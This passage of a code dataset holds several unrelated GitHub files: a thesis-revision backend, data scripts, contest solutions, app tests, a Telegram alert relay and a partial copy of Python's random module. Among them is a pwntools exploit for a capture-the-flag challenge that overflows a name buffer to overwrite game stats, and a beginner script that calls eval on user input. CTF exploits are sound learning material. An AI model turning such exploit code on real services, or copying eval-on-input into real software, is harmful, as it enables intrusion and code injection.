revisi\n\n\ndef fetch_0(sidang_id, penguji_id, sidang=False, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, status=None, **kwargs):\n with db.Session() as session:\n sidang = models.Sidang._get(session, sidang_id)\n _penguji = [p for p in sidang.penguji if p.id==penguji_id]\n if not _penguji:\n raise Error(\"Anda bukan penguji TA ini\", 401)\n revisi = _penguji[0].revisi\n if status:\n revisi = [r for r in revisi if r.status==status]\n\n revisi = [postprocess(\n x,\n sidang=sidang,\n penguji=penguji,\n penolakan=penolakan,\n ta=ta,\n pembimbing=pembimbing,\n mhs=mhs,\n revisi_terakhir=revisi_terakhir,\n **kwargs\n ) for x in revisi]\n return revisi\n\ndef fetch(sidang_id, penguji_id, penguji=DEFAULT_PENGUJI, penolakan=DEFAULT_PENOLAKAN, ta=DEFAULT_TA, pembimbing=DEFAULT_PEMBIMBING, mhs=DEFAULT_MHS, revisi_terakhir=DEFAULT_REVISI_TERAKHIR, status=None, **kwargs):\n sidang = models.Sidang.get(\n sidang_id=sidang_id, \n user_id=penguji_id,\n ta=ta,\n pembimbing=pembimbing,\n mhs=mhs,\n penguji=penguji,\n revisi_terakhir=revisi_terakhir,\n revisi=True,\n **kwargs\n )\n if status:\n sidang[\"revisi\"] = [r for r in sidang[\"revisi\"] if r==status]\n return sidang\n\ndef terima(revisi_id, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.BARU and revisi.status != db.RevisiStatus.DILIHAT:\n raise Error(\"Anda sudah menerima/menolak revisi ini\", 403)\n \n if revisi.penguji.nilai is None:\n raise Error(\"Anda belum mengisi nilai\", 403)\n \n if revisi.penguji.nomor == 1 and revisi.penguji.sidang.ta.type==db.TAType.TA and revisi.penguji.sidang.ta.mhs.level == db.MhsLevel.S1 and (revisi.penguji.sidang.form_pomits is None or not revisi.penguji.sidang.form_pomits.is_filled):\n raise Error(\"Anda belum mengisi form POMITS\", 403)\n \n if not revisi.penguji.dosen.ttd:\n raise Error(\"Anda belum upload tanda tangan\", 403)\n\n revisi.status = 
db.RevisiStatus.DITERIMA\n revisi.updated_at = funcs.now()\n session.add(revisi)\n\n revisi.penguji.status = db.PengujiStatus.ACC\n session.add(revisi.penguji)\n\n ta = None\n belum_acc = [1 for p in revisi.penguji.sidang.penguji if p.status!=db.PengujiStatus.ACC]\n if not belum_acc:\n if revisi.penguji.sidang.status != db.SidangStatus.SELESAI:\n revisi.penguji.sidang.status = db.SidangStatus.SELESAI\n session.add(revisi.penguji.sidang)\n if revisi.penguji.sidang.ta.status != db.TAStatus.SELESAI:\n revisi.penguji.sidang.ta.status = db.TAStatus.SELESAI\n session.add(revisi.penguji.sidang.ta)\n\n if revisi.penguji.sidang.ta.type == db.TAType.PROPOSAL:\n sidang = revisi.penguji.sidang\n ta = db.TA(\n mhs_id=sidang.ta.mhs.id,\n judul=sidang.ta.judul,\n type=db.TAType.TA,\n status=db.TAStatus.BIMBINGAN\n )\n session.add(ta)\n for p in sidang.ta.pembimbing:\n p2 = db.Pembimbing(\n id=p.id,\n ta=ta,\n nomor=p.nomor,\n status=db.PembimbingStatus.BIMBINGAN\n )\n session.add(p2)\n\n session.commit()\n session.flush()\n\n ret = {}\n if ta:\n ret[\"ta_id\"] = ta.id\n return ret\n\ndef tolak(revisi_id, penguji_id, detail, file_name=None):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.BARU and revisi.status != db.RevisiStatus.DILIHAT:\n raise Error(\"Anda sudah menerima/menolak revisi ini\", 403)\n\n if file_name and not os.path.isfile(os.path.join(DIR_FILE_PENOLAKAN, f\"{revisi_id}.pdf\")):\n raise Error(\"Anda belum upload file penolakan\", 403)\n\n if revisi.penolakan:\n revisi.penolakan.detail = detail\n if file_name:\n revisi.penolakan.file_name = file_name\n session.add(revisi.penolakan)\n else:\n penolakan = db.PenolakanRevisi(\n id=revisi.id,\n detail=detail,\n file_name=file_name\n )\n session.add(penolakan)\n\n revisi.status = db.RevisiStatus.DITOLAK\n revisi.updated_at = funcs.now()\n session.add(revisi)\n\n session.commit()\n session.flush()\n\n\ndef upload_file_penolakan(revisi_id, file, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.BARU and revisi.status != db.RevisiStatus.DILIHAT:\n raise Error(\"Anda sudah menerima/menolak revisi ini\", 403)\n\n file.save(f\"{DIR_FILE_PENOLAKAN}/{revisi_id}.pdf\")\n\ndef download_file_penolakan(revisi_id, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n if revisi.status != db.RevisiStatus.DITOLAK:\n raise Error(\"Revisi tidak ditolak\", 403)\n\n if not revisi.file_name:\n raise Error(\"Revisi ditolak tanpa file\", 403)\n\n file_name = f\"{revisi_id}.pdf\"\n if revisi.file_name and not os.path.isfile(os.path.join(DIR_FILE_PENOLAKAN, file_name)):\n raise Error(\"File penolakan hilang\", 404)\n\n return send_from_directory(directory=models.Revisi.DIR_FILE_PENOLAKAN, path=file_name, as_attachment=True)\n\n \ndef download_file_revisi(revisi_id, penguji_id):\n with db.Session() as session:\n revisi = _get(session, revisi_id, penguji_id)\n\n file_name = f\"{revisi_id}.pdf\"\n if revisi.file_name and not os.path.isfile(os.path.join(DIR_FILE_REVISI, file_name)):\n raise Error(\"File revisi hilang\", 404)\n\n return send_from_directory(directory=models.Revisi.DIR_FILE_REVISI, path=file_name, as_attachment=True)","repo_name":"R-N/simta-backend","sub_path":"simta/models/Revisi.py","file_name":"Revisi.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"22447142431","text":"\"\"\"\n\nAuthor Name: Nasooh Ismail\nVersion: 1.0\nInput: station_dictionary.csv\nOutput: obs_t2.csv, station_dictionary.csv(overwrite)\nUpdate:\nthis script will extract daily data from the obs_t2.csv and save each days data in a seperate file with the file name _t2_obs.csv\nwriiten by nasooh for the project probilistic_nowcasting\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom pytz import UTC\nimport os\n\n\ndf = pd.read_csv('./output/obs_t2.csv')\ndf = df.iloc[:, 1:]\nstart_date = pd.to_datetime('2020-07-28 16:00') #convert 2020/07/30 00:00 to UTC = 2020/07/28 16:00\nend_date = start_date + pd.DateOffset(hours=767)\ndate_index = pd.date_range(start=start_date, end=end_date, freq='H')\n\n# Assign the datetime index to the DataFrame\ndf.index = date_index\n\n# Display the updated DataFrame\nprint(df.head())\n\n\n# Create the output directory if it doesn't exist\noutput_dir = './output/obs_csv'\nos.makedirs(output_dir, exist_ok=True)\n\n# Convert the index to a pandas DatetimeIndex\ndf.index = pd.DatetimeIndex(df.index)\n\n# Iterate over each day and save data for each station as a separate CSV file\nfor date in pd.DatetimeIndex(df.index):\n # Filter the DataFrame for the current date\n date_data = df[df.index.date == date]\n \n # Extract the year, month, and day for the file name\n year = str(date.year)\n month = str(date.month).zfill(2)\n day = str(date.day).zfill(2)\n \n # Generate the file name\n file_name = f'{year}{month}{day}_t2_obs.csv'\n \n # Create the full file path\n file_path = os.path.join(output_dir, file_name)\n \n # Save the data for the current date as a CSV file\n date_data.to_csv(file_path, index_label='valid_time')\n","repo_name":"nasooh-ismail/T2_prob_nowcast_pysteps","sub_path":"src/S4_extract_dailydata_from_obs_t2.py","file_name":"S4_extract_dailydata_from_obs_t2.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5698989796","text":"# Baekjoon Online Judge - 1504번. 
특정한 최단 경로\nimport heapq\n\n\ndef dijkstra(n):\n h = []\n dist = [INF] * (N + 1)\n dist[n] = 0\n heapq.heappush(h, (0, n))\n while h:\n # 현재 노드까지의 거리 node_dist, 현재 노드\n node_dist, node = heapq.heappop(h)\n # 현재노드까지의 거리가 최소 보다 크다면 끝\n if dist[node] < node_dist:\n continue\n\n for v, w in graph[node]:\n cost = node_dist + w\n # 현재까지의 거리가 저장된 최소 거리보다 작다면\n if cost < dist[v]:\n # 갱신해준다\n dist[v] = cost\n heapq.heappush(h, (cost, v))\n return dist\n\n\nN, E = map(int, input().split())\ngraph = [[] for _ in range(N+1)]\nINF = 10**9\n\nfor _ in range(E):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\n graph[b].append((a, c))\n\nv1, v2 = map(int, input().split())\nstart_1 = dijkstra(1)\nstart_v1 = dijkstra(v1)\nstart_v2 = dijkstra(v2)\n\n# 1 -> v1 -> v2 -> N\nresult1 = start_1[v1] + start_v1[v2] + start_v2[N]\n# 1 -> v2 -> v1 -> N\nresult2 = start_1[v2] + start_v2[v1] + start_v1[N]\n\nans = min(result1, result2)\n# ans != INF가 안되는 이유 => 그러한 경로가 없을 때\n# INF이여야 -1을 출력하니까 적은걸로 표현해야한다\nif ans < INF:\n print(ans)\nelse:\n print(-1)\n","repo_name":"wnstj-yang/Algorithm","sub_path":"BOJ/BOJ_1504.py","file_name":"BOJ_1504.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27014143610","text":"import MapReduce\nimport sys\n\n\"\"\"\nWord Count Example in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\nmaxx = 0;\nmaxy = 0;\n\ndef mapper(record):\n global maxx, maxy\n # this assumes both matrixs have the same dimensions.\n index = 0\n #print record\n while index < 5:\n if record[0] == \"a\":\n mr.emit_intermediate(str(record[1])+str(index), record)\n else:\n mr.emit_intermediate(str(index)+str(record[2]), record)\n index += 1\n\ndef reducer(key, list_of_values):\n arrayA = [0 for x in xrange(5)]\n arrayB = [0 for x in xrange(5)]\n posx = int(key[0])\n posy = int(key[1])\n # recreate matrix\n for item in list_of_values:\n if item[0] == \"a\":\n arrayA[item[2]] = item[3]\n else:\n arrayB[item[1]] = item[3]\n index = 0 \n product = 0\n# print key,list_of_values\n# print \"a\",arrayA\n# print \"b\",arrayB\n while index < 5:\n product += arrayA[index] * arrayB[index]\n index += 1\n \n# print \"product\",product\n mr.emit((posx, posy, product))\n# mr.emit((row, column, product))\n\n# print resultsM\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","repo_name":"kietlieng/Bigdata-DataScienceCourse","sub_path":"assignment3/assign3_6-matrix-v2-Improved.py","file_name":"assign3_6-matrix-v2-Improved.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22720648056","text":"import json\nimport os\nfrom contextlib import contextmanager\nfrom time import sleep\nfrom typing import Generator\n\nimport pytest\nimport requests\nfrom lightning.app.testing.config import _Config\nfrom lightning.app.utilities.cloud import _get_project\nfrom lightning.app.utilities.imports import _is_playwright_available, requires\nfrom lightning.app.utilities.network import LightningClient\nfrom lightning_cloud.openapi import V1LightningworkState\nfrom lightning_cloud.openapi.rest import ApiException\n\nif _is_playwright_available():\n import playwright\n from playwright.sync_api import HttpCredentials, Page, 
expect, sync_playwright\n\n\n@requires(\"playwright\")\n@contextmanager\ndef get_gallery_app_page(app_name) -> Generator:\n with sync_playwright() as p:\n browser = p.chromium.launch(timeout=5000, headless=bool(int(os.getenv(\"HEADLESS\", \"0\"))))\n payload = {\n \"apiKey\": _Config.api_key,\n \"username\": _Config.username,\n \"duration\": \"120000\",\n }\n context = browser.new_context(\n http_credentials=HttpCredentials(\n {\n \"username\": os.getenv(\"LAI_USER\", \"\"),\n \"password\": os.getenv(\"LAI_PASS\", \"\"),\n }\n ),\n record_video_dir=os.path.join(_Config.video_location, app_name),\n record_har_path=_Config.har_location,\n )\n gallery_page = context.new_page()\n res = requests.post(_Config.url + \"/v1/auth/login\", data=json.dumps(payload))\n token = res.json()[\"token\"]\n gallery_page.goto(_Config.url)\n gallery_page.evaluate(\n \"\"\"data => {\n window.localStorage.setItem('gridUserId', data[0]);\n window.localStorage.setItem('gridUserKey', data[1]);\n window.localStorage.setItem('gridUserToken', data[2]);\n }\n \"\"\",\n [_Config.id, _Config.key, token],\n )\n\n for retry_count in range(5):\n try:\n gallery_page.goto(f\"{_Config.url}/apps\")\n except playwright._impl._api_types.TimeoutError as ex:\n try_ex = ex\n else:\n try_ex = None\n break\n if try_ex:\n raise try_ex\n\n # Find the app in the gallery\n gallery_page.locator(f\"text={app_name}\").first.click()\n yield gallery_page\n\n\n@requires(\"playwright\")\n@contextmanager\ndef launch_from_gallery_app_page(gallery_page) -> Generator:\n with gallery_page.context.expect_page() as page_catcher:\n gallery_page.locator(\"text=Try it free\").click()\n\n app_page = page_catcher.value\n app_page.wait_for_load_state(timeout=0)\n\n try:\n yield app_page\n except KeyboardInterrupt:\n pass\n\n\n@requires(\"playwright\")\n@contextmanager\ndef clone_and_run_from_gallery_app_page(app_gallery_page) -> Generator:\n with app_gallery_page.expect_navigation():\n app_gallery_page.locator(\"text=Clone & Run\").click()\n\n admin_page = app_gallery_page\n\n sleep(5)\n # Scroll to the bottom of the page. 
Used to capture all logs.\n admin_page.evaluate(\n \"\"\"\n var intervalID = setInterval(function () {\n var scrollingElement = (document.scrollingElement || document.body);\n scrollingElement.scrollTop = scrollingElement.scrollHeight;\n }, 200);\n\n if (!window._logs) {\n window._logs = [];\n }\n\n if (window.logTerminals) {\n Object.entries(window.logTerminals).forEach(\n ([key, value]) => {\n window.logTerminals[key]._onLightningWritelnHandler = function (data) {\n window._logs = window._logs.concat([data]);\n }\n }\n );\n }\n \"\"\"\n )\n\n # TODO: Add a timeout here.\n while True:\n try:\n open_app_button = admin_page.locator(\"text=Open App\")\n open_app_button.wait_for(timeout=1000)\n\n if open_app_button.is_disabled():\n sleep(5)\n continue\n\n with admin_page.context.expect_page() as page_catcher:\n open_app_button.click()\n app_page = page_catcher.value\n app_page.wait_for_load_state(timeout=0)\n break\n except (\n playwright._impl._api_types.Error,\n playwright._impl._api_types.TimeoutError,\n ):\n pass\n\n def fetch_logs() -> str:\n return admin_page.evaluate(\"window._logs;\")\n\n lightning_app_id = str(app_page.url).split(\".\")[0].split(\"//\")[-1]\n print(f\"The Lightning Id Name : [bold magenta]{lightning_app_id}[/bold magenta]\")\n\n # Sleep until the file server is running\n client = LightningClient()\n project = _get_project(client)\n\n running = False\n\n while not running:\n sleep(10)\n\n works = client.lightningwork_service_list_lightningwork(\n project_id=project.project_id,\n app_id=lightning_app_id,\n ).lightningworks\n\n for work in works:\n if work.name == \"root.file_upload\":\n if work.status.phase == V1LightningworkState.RUNNING:\n running = True\n\n # Sleep to give the server time to start\n sleep(180)\n\n try:\n yield admin_page, app_page, fetch_logs\n except KeyboardInterrupt:\n pass\n finally:\n print(f\"##################### DELETING APP {lightning_app_id}\")\n printed_logs = []\n for log in fetch_logs():\n if log not in printed_logs:\n printed_logs.append(log)\n print(log.split(\"[0m\")[-1])\n stop_button = admin_page.locator(\"text=Stop\")\n try:\n stop_button.wait_for(timeout=3 * 1000)\n stop_button.click()\n except (\n playwright._impl._api_types.Error,\n playwright._impl._api_types.TimeoutError,\n ):\n pass\n\n client = LightningClient()\n project = _get_project(client)\n try:\n res = client.lightningapp_instance_service_delete_lightningapp_instance(\n project_id=project.project_id,\n id=lightning_app_id,\n )\n assert res == {}\n except ApiException as e:\n print(f\"Failed to delete app {lightning_app_id}. 
Exception {e}\")\n\n\ndef validate_app_functionalities(app_page: \"Page\") -> None:\n \"\"\"\n app_page: The UI page of the app to be validated.\n \"\"\"\n\n while True:\n try:\n app_page.reload()\n sleep(5)\n app_label = app_page.frame_locator(\"iframe\").locator(\"text=Choose your AI task\")\n app_label.wait_for(timeout=30 * 1000)\n break\n except (\n playwright._impl._api_types.Error,\n playwright._impl._api_types.TimeoutError,\n ):\n pass\n\n input_field = app_page.frame_locator(\"iframe\").locator('input:below(:text(\"Data URL\"))').first\n input_field.wait_for(timeout=1000)\n input_field.type(\"https://pl-flash-data.s3.amazonaws.com/hymenoptera_data.zip\")\n sleep(1)\n upload_btn = app_page.frame_locator(\"iframe\").locator('button:has-text(\"Upload\")')\n upload_btn.wait_for(timeout=1000)\n upload_btn.click()\n\n sleep(10)\n\n train_folder_dropdown = app_page.frame_locator(\"iframe\").locator(\"#mui-2\")\n train_folder_dropdown.click()\n\n train_folder = app_page.frame_locator(\"iframe\").locator('text=\"hymenoptera_data/train\"')\n train_folder.scroll_into_view_if_needed()\n train_folder.click()\n\n val_folder_dropdown = app_page.frame_locator(\"iframe\").locator(\"#mui-3\")\n val_folder_dropdown.click()\n\n val_folder = app_page.frame_locator(\"iframe\").locator('text=\"hymenoptera_data/val\"')\n val_folder.scroll_into_view_if_needed()\n val_folder.click()\n\n train_btn = app_page.frame_locator(\"iframe\").locator('button:has-text(\"Start training!\")')\n train_btn.click()\n\n # Sometimes the results don't show until we refresh the page\n sleep(10)\n\n app_page.reload()\n\n app_page.frame_locator(\"iframe\").locator('button:has-text(\"RESULTS\")').click()\n runs = app_page.frame_locator(\"iframe\").locator(\"table tbody tr\")\n expect(runs).to_have_count(1, timeout=120000)\n\n # TODO: add more validations.\n\n\n@pytest.mark.skip(reason=\"launch button doesn't work for this app\")\ndef test_launch_app_from_gallery():\n app_name = os.getenv(\"TEST_APP_NAME\", None)\n if app_name is None:\n raise ValueError(\"TEST_APP_NAME environment variable is not set\")\n\n with get_gallery_app_page(app_name) as gallery_page:\n with launch_from_gallery_app_page(gallery_page) as app_page:\n validate_app_functionalities(app_page)\n\n\n@pytest.mark.skipif(not os.getenv(\"TEST_APP_NAME\", None), reason=\"requires TEST_APP_NAME env var\")\ndef test_clone_and_run_app_from_gallery():\n app_name = os.getenv(\"TEST_APP_NAME\", None)\n if app_name is None:\n raise ValueError(\"TEST_APP_NAME environment variable is not set\")\n\n with get_gallery_app_page(app_name) as gallery_page:\n with clone_and_run_from_gallery_app_page(gallery_page) as (_, app_page, _):\n validate_app_functionalities(app_page)\n\n\ndef test_app_locally():\n with sync_playwright() as p:\n browser = p.chromium.launch(headless=False)\n page = browser.new_page()\n\n page.goto(\"http://127.0.0.1:7501/view/Flashy\")\n\n validate_app_functionalities(page)\n","repo_name":"Lightning-Universe/Flashy_app","sub_path":"tests/test_app_gallery.py","file_name":"test_app_gallery.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"22039112350","text":"from django.contrib import admin\nfrom .models import ConnectionsList, ForgeLink\n\n\nclass ConnectionsListAdmin(admin.ModelAdmin):\n list_filter = [\"user\"]\n list_display = [\"user\"]\n search_fields = [\"user\"]\n read_only_fields = [\"user\"]\n\n class Meta:\n model = 
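# --- Editorial sketch (not a dataset record) --------------------------------
# The test_app_gallery.py record above retries UI steps with ad-hoc
# while/try loops and fixed sleeps (waiting for the "Open App" button to
# enable, reloading until the iframe renders). A small generic poll helper
# captures that pattern with stdlib only; the predicate, timeout, and
# interval values here are hypothetical, not from the test suite.
import time

def poll_until(predicate, timeout=60.0, interval=5.0, exceptions=(Exception,)):
    """Call predicate() until it returns truthy or the timeout expires."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            result = predicate()
            if result:
                return result
        except exceptions:
            pass  # transient failure, e.g. element not rendered yet
        time.sleep(interval)
    raise TimeoutError(f"condition not met within {timeout}s")

# usage sketch: poll_until(lambda: not open_app_button.is_disabled())
assert poll_until(lambda: True, timeout=1, interval=0.1) is True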
ConnectionsList\n\n\nadmin.site.register(ConnectionsList, ConnectionsListAdmin)\n\n\nclass ForgeLinkAdmin(admin.ModelAdmin):\n list_filter = [\"sender\", \"receiver\"]\n list_display = [\"sender\", \"receiver\"]\n search_fields = [\"sender__email\", \"receiver__email\",\n \"sender__username\", \"receiver__username\", ]\n\n class Meta:\n model = ForgeLink\n\n\nadmin.site.register(ForgeLink, ForgeLinkAdmin)\n","repo_name":"SahineDiallo/SpiderNetwork","sub_path":"Connection/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7774550886","text":"si = input (\"inserisci un numero: \" )\ni = float(si)\n\nif i < 0 :\n print(\"numero inferiore a zero\") \nelif i == 0:\n print(\"inseiro uguale a zero\")\nelse:\n print(\"numero maggiore di zero\")\n\n\nsi = eval(input (\"inserisci un numero: \" )) # The expression argument \n # is parsed and evaluated as a \n # Python expression (technically \n # speaking, a condition list) \n # using the globals and locals \n # dictionaries as global and local \n # namespace. \n\nif si < 0 :\n print(\"numero inferiore a zero\") \nelif si == 0:\n print(\"inseiro uguale a zero\")\nelse:\n print(\"numero maggiore di zero\")\n\n\n","repo_name":"lstorchi/teaching","sub_path":"helloworld/oltrehw4.py","file_name":"oltrehw4.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32691437151","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*\n\nfrom pwn import *\nfrom sys import argv\nfrom time import sleep\n\ncontext.terminal = ['terminator','-e']\ncontext.log_level = \"debug\"\n\nchall = \"./vuln\"\n#libc = ELF()\nelf = ELF(chall)\ncontext.binary = chall\ncontext.binary.checksec()\n\nif len(argv) >= 2 and argv[1] == \"r\":\n p = remote(\"35.200.120.35\", 9002)\nelif len(argv) >= 2 and argv[1] == \"d\":\n\tcmd = \"\"\"\n\t\tb *give_monster_name+222\n b *give_monster_name+140\n\t\tc\n\t\"\"\"\n\tp = gdb.debug(chall,cmd)\nelse:\n p = process(chall)\n\n# buf for name\npayload = b\"A\" * 0x8 * 2\n# HP\npayload += p64(0x600000000000006f)\n# ATK\npayload += p64(0x9fffffffffffffff)\np.recvuntil(\"Input name:\")\nsleep(0.5)\np.sendline(payload)\n\np.interactive()\n","repo_name":"t3mp-0xCC/write-up","sub_path":"nitic_ctf_2/pwn_monster_2/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6032124780","text":"#!/usr/bin/python3.8\n\nimport json\nfrom sys import stderr\nimport requests\nfrom gevent.pywsgi import WSGIServer\n\nfrom flask import Flask, request, Response, render_template\napp = Flask(__name__)\n\nimport confuse\nconfig = confuse.Configuration(__name__)\nconfig.set_file('config.yaml')\nconfig_data = config.get()\n\n@app.route('/', methods=['POST'])\ndef post(chat_name=None):\n if chat_name not in config_data:\n return Response(\"Not found\", status=404)\n dryRun = True if request.args.get('dry-run') else False\n\n try:\n data = json.loads(request.data)\n except Exception as e:\n print( str(e), file=stderr)\n return Response(\"Bad data format\", status=400)\n\n template_name = config_data[chat_name]['template'] if 'template' in config_data[chat_name] else 'default'\n try:\n template = render_template('{}.tpl'.format( template_name ), data=data )\n except Exception as e:\n error = \"Template {}.tpl error: {}\".format( 
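# --- Editorial sketch (not a dataset record) --------------------------------
# The exp.py record above builds its overflow payload with pwntools' p64(),
# which packs an integer as 8 little-endian bytes. The stdlib equivalent is
# struct.pack("<Q", ...); the payload values below repeat the record's own
# HP field just to show the packing, nothing new is targeted.
import struct

def p64(value: int) -> bytes:
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)

payload = b"A" * 0x10               # 16-byte filler for the name buffer
payload += p64(0x600000000000006F)  # HP field from the record
assert p64(1) == b"\x01" + b"\x00" * 7  # little-endian byte order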
template_name, e )\n print( error, file=stderr)\n return Response( error, status=400)\n\n if dryRun:\n return Response(template, status=200)\n else:\n return send_message( config_data[chat_name], template )\n\ndef send_message(chat, alert):\n url = \"https://api.telegram.org/bot{}/sendMessage\".format( chat['token'] )\n\n if len(alert) > 4096:\n alert = alert[:4093] + '...'\n\n params = (\n ( \"chat_id\", chat['chat_id'] ),\n ( \"text\", alert ),\n ( \"parse_mode\", \"markdown\" ),\n ( \"disable_web_page_preview\", \"True\" ),\n )\n\n try:\n r = requests.post( url, params=params )\n r.raise_for_status()\n except requests.exceptions.HTTPError as e:\n print(e.response.text, file=stderr)\n print(alert, file=stderr)\n return Response(e.response.text, status=400)\n else:\n return Response('OK', status=200)\n\nif __name__ == '__main__':\n http_server = WSGIServer(('', 5000), app)\n http_server.serve_forever()\n\n\n","repo_name":"danuk/k8s-telegram-sender","sub_path":"app/tlgrm_send.py","file_name":"tlgrm_send.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20459210786","text":"from warnings import warn as _warn\nfrom types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType\nfrom math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil\nfrom math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin\nfrom os import urandom as _urandom\nfrom collections.abc import Set as _Set, Sequence as _Sequence\nfrom hashlib import sha512 as _sha512\n__all__ = ['Random', 'seed', 'random', 'uniform', 'randint', 'choice', 'sample', 'randrange', 'shuffle', 'normalvariate', 'lognormvariate', 'expovariate', 'vonmisesvariate', 'gammavariate', 'triangular', 'gauss', 'betavariate', 'paretovariate', 'weibullvariate', 'getstate', 'setstate', 'getrandbits', 'SystemRandom']\nNV_MAGICCONST = 4*_exp(-0.5)/_sqrt(2.0)\nTWOPI = 2.0*_pi\nLOG4 = _log(4.0)\nSG_MAGICCONST = 1.0 + _log(4.5)\nBPF = 53\nRECIP_BPF = 2**(-BPF)\nimport _random\n\nclass Random(_random.Random):\n __qualname__ = 'Random'\n VERSION = 3\n\n def __init__(self, x=None):\n self.seed(x)\n self.gauss_next = None\n\n def seed(self, a=None, version=2):\n if a is None:\n try:\n a = int.from_bytes(_urandom(32), 'big')\n except NotImplementedError:\n import time\n a = int(time.time()*256)\n if version == 2 and isinstance(a, (str, bytes, bytearray)):\n if isinstance(a, str):\n a = a.encode()\n a += _sha512(a).digest()\n a = int.from_bytes(a, 'big')\n super().seed(a)\n self.gauss_next = None\n\n def getstate(self):\n return (self.VERSION, super().getstate(), self.gauss_next)\n\n def setstate(self, state):\n version = state[0]\n if version == 3:\n (version, internalstate, self.gauss_next) = state\n super().setstate(internalstate)\n elif version == 2:\n (version, internalstate, self.gauss_next) = state\n try:\n internalstate = tuple(x % 4294967296 for x in internalstate)\n except ValueError as e:\n raise TypeError from e\n super().setstate(internalstate)\n else:\n raise ValueError('state with version %s passed to Random.setstate() of version %s' % (version, self.VERSION))\n\n def __getstate__(self):\n return self.getstate()\n\n def __setstate__(self, state):\n self.setstate(state)\n\n def __reduce__(self):\n return (self.__class__, (), self.getstate())\n\n def randrange(self, start, stop=None, step=1, _int=int):\n istart = _int(start)\n if istart != start:\n raise ValueError('non-integer arg 1 for randrange()')\n if stop 
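# --- Editorial sketch (not a dataset record) --------------------------------
# The tlgrm_send.py record above trims alerts to Telegram's 4096-character
# sendMessage limit (alert[:4093] + '...') before posting. The same logic as
# a pure, testable helper; the function name is mine:
TELEGRAM_LIMIT = 4096

def truncate_alert(text: str, limit: int = TELEGRAM_LIMIT) -> str:
    return text if len(text) <= limit else text[: limit - 3] + "..."

assert len(truncate_alert("x" * 5000)) == TELEGRAM_LIMIT
assert truncate_alert("short") == "short"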
is None:\n if istart > 0:\n return self._randbelow(istart)\n raise ValueError('empty range for randrange()')\n istop = _int(stop)\n if istop != stop:\n raise ValueError('non-integer stop for randrange()')\n width = istop - istart\n if step == 1 and width > 0:\n return istart + self._randbelow(width)\n if step == 1:\n raise ValueError('empty range for randrange() (%d,%d, %d)' % (istart, istop, width))\n istep = _int(step)\n if istep != step:\n raise ValueError('non-integer step for randrange()')\n if istep > 0:\n n = (width + istep - 1)//istep\n elif istep < 0:\n n = (width + istep + 1)//istep\n else:\n raise ValueError('zero step for randrange()')\n if n <= 0:\n raise ValueError('empty range for randrange()')\n return istart + istep*self._randbelow(n)\n\n def randint(self, a, b):\n return self.randrange(a, b + 1)\n\n def _randbelow(self, n, int=int, maxsize=1 << BPF, type=type, Method=_MethodType, BuiltinMethod=_BuiltinMethodType):\n getrandbits = self.getrandbits\n if type(self.random) is BuiltinMethod or type(getrandbits) is Method:\n k = n.bit_length()\n r = getrandbits(k)\n while r >= n:\n r = getrandbits(k)\n return r\n random = self.random\n if n >= maxsize:\n _warn('Underlying random() generator does not supply \\nenough bits to choose from a population range this large.\\nTo remove the range limitation, add a getrandbits() method.')\n return int(random()*n)\n rem = maxsize % n\n limit = (maxsize - rem)/maxsize\n r = random()\n while r >= limit:\n r = random()\n return int(r*maxsize) % n\n\n def choice(self, seq):\n try:\n i = self._randbelow(len(seq))\n except ValueError:\n raise IndexError('Cannot choose from an empty sequence')\n return seq[i]\n\n def shuffle(self, x, random=None):\n if random is None:\n randbelow = self._randbelow\n for i in reversed(range(1, len(x))):\n j = randbelow(i + 1)\n (x[i], x[j]) = (x[j], x[i])\n else:\n _int = int\n for i in reversed(range(1, len(x))):\n j = _int(random()*(i + 1))\n (x[i], x[j]) = (x[j], x[i])\n\n def sample(self, population, k):\n if isinstance(population, _Set):\n population = tuple(population)\n if not isinstance(population, _Sequence):\n raise TypeError('Population must be a sequence or set. 
